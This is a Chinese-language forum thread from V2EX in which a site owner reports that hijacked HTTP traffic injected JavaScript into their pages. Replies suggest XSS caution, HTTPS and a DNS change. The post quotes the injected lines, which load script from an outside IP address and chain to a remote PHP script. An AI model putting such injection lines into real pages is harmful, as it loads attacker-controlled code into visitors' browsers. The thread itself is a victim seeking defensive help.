V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
abeholder
V2EX  ›  问与答

这是什么劫持?有没有大佬进来看一下~

  •  
  •   abeholder · 2018-09-17 23:05:37 +08:00 · 1255 次点击
    这是一个创建于 2243 天前的主题,其中的信息可能已经有所发展或是发生改变。
    自己用 vps 搭建了个网站,里面有些自己需要的爬虫数据和一些小玩意,没有上 https。
    遇到过很多次被运营商劫持插入了些 js 什么的,自己也没怎么在意。
    但刚刚发现被劫持插入的 js 代码如下:

    <script src="http://45.126.123.80:118/j.js?MAC=CC81XXXXXXXX"></script>

    点开之后里面是这样的

    document.writeln("<script src=\'http://45.126.123.80:118/t.php\'></script>");

    然后继续点开的 php 代码我也看不懂。我不明白的是,为什么他要这样绕一层。
    还有个我不明白的问题,他是怎么拿到我路由器的 MAC 地址的(我是通过楼下房东家的网络上网的,房东拉了根网线上来)。

    有没有大佬能指导下~~~ T T
    4 条回复    2018-09-18 10:39:14 +08:00
    Fulcrum
        1
    Fulcrum  
       2018-09-18 08:50:27 +08:00 via Android
    小心是 XSS 攻击
    MOONYANYI
        2
    MOONYANYI  
       2018-09-18 08:51:14 +08:00 via Android   ❤️ 1
    还是上个 https 吧,反正现在免费的多
    abeholder
        3
    abeholder  
    OP
       2018-09-18 10:35:57 +08:00
    @Fulcrum 静态网站~~
    MOONYANYI
        4
    MOONYANYI  
       2018-09-18 10:39:14 +08:00
    @abeholder #3 另外也可以顺便改下 DNS 节点
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2690 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 25ms · UTC 12:20 · PVG 20:20 · LAX 04:20 · JFK 07:20
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.